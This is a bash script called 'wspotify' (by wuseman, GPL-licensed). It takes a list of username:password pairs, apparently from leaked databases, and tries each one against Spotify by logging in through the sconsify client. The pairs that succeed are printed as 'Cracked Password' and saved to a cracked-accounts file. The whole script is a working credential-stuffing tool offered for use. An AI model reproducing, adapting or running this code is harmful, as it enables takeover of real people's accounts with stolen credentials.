#!/bin/bash
################################################################################
################################################################################
####                                                                       #####
#### A notice to all nerds.                                                #####
#### If you will copy developers real work it will not make you a hacker.  #####
#### Resepect all developers, we doing this because it's fun!              #####
####                                                                       #####
################################################################################
################################ SOURCE CODE ###################################
################################################################################
####  Copyright (C) 2018-2019, wuseman                                     #####
####                                                                       #####
####  This program is free software; you can redistribute it and/or modify #####
####  it under the terms of the GNU General Public License as published by #####
####  the Free Software Foundation; either version 2 of the License, or    #####
####  (at your option) any later version.                                  #####
####                                                                       #####
####  This program is distributed in the hope that it will be useful,      #####
####  but WITHOUT ANY WARRANTY; without even the implied warranty of       #####
####  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the        #####
####  GNU General Public License for more details.                         #####
####                                                                       #####
####  You must obey the GNU General Public License. If you will modify     #####
####  wspotify file(s), you may extend this exception to your version      #####
####  of the file(s), but you are not obligated to do so.  If you do not   #####
####  wish to do so, delete this exception statement from your version.    #####
####  If you delete this exception statement from all source files in the  #####
####  program, then also delete it here.                                   #####
####                                                                       #####
####  Contact:                                                             #####
####          IRC: Freenode @ wuseman                                      #####
####          Mail: wuseman <wuseman@nr1.nu>                               #####
####                                                                       #####
################################################################################

banner() {
cat << "EOF"
                          _   _  __
__      _____ _ __   ___ | |_(_)/ _|_   _ 
\ \ /\ / / __| '_ \ / _ \| __| | |_| | | | Author: wuseman
 \ V  V /\__ \ |_) | (_) | |_| |  _| |_| | Version: 1.0
  \_/\_/ |___/ .__/ \___/ \__|_|_|  \__, |
             |_|                    |___/ 
-----------------------------------------------------------
EOF
}

find /usr/include -type d |grep 'libspotify' &> /dev/null
             if [[ "$?" -ne "0" ]]; then
             if [[ -z "$LIBSPOTIFY" ]]; then
                         printf "Libspotify is deprecated but is required for $basename$0 bruteforcing\nto work, do you have libspotify installed? (YES/no): "
               read LIBSPOTIFY
                 if ! [[ "$LIBSPOTIFY" = "YES" ]]; then
                  echo "Can't continue until libspotify has been installed.."
                   echo "Exiting.."
                   exit 1
                 fi
fi
fi
./sconsify -version &> /dev/null
   if [[ "$?" -ne "0" ]]; then
        echo "Sconsify is required to be installed before we attacking targets.."
         read -p "Download and install sconsify (y/N): " installsconsify
          if [[ "$installsconsify" = "y" ]]; then
             echo -e "Hold on, downloading sconsify.."
             wget -q --user-agent="${USERAGENT}" "https://github.com/fabiofalci/sconsify/releases/download/next-20180428/linux-x86_64-sconsify-0.6.0-next.zip"
             echo -e "Unzipping sconsify into current dir.."
             unzip -q -o "linux-x86_64-sconsify-0.6.0-next.zip"
             chmod +x ./sconsify
             echo -e "Cleaning up."
             echo "All done.."
             rm linux* &> /dev/null
             sleep 2
         else
            echo -e "$basename$0: internal error -- sconsify is required to be installed.."
            exit 1
         fi
  fi



if [[ -z "$1" ]]; then
   banner
   echo -e "You must choose at least one database ... "
   echo -e "Example usage: ./wspotify database.txt"
   echo -e "-----------------------------------------------------------"
   exit 1
fi

banner

while read line; do
 SPOTIFY_USER="$(echo $line|cut -d: -f1)"
 SPOTIFY_PASS="$(echo $line|cut -d: -f2)"
  ./sconsify -username="${SPOTIFY_USER}" <<< "${SPOTIFY_PASS}" 2> /dev/null|grep -i -q "bad"
     if [[ "$?" -eq "0" ]]; then
         echo -e "[\e[1;31m<<\e[0m] - Wrong Password: ${SPOTIFY_USER}:${SPOTIFY_PASS}"
      else
          echo -e "[\e[1;32m>>\e[0m] - Cracked Password: ${SPOTIFY_USER}:${SPOTIFY_PASS}" 
          echo -e "${SPOTIFY_USER}:${SPOTIFY_PASS}" >> /root/emagnet/cracked-accounts/cracked-spotify-accounts.txt
      fi
done < $1
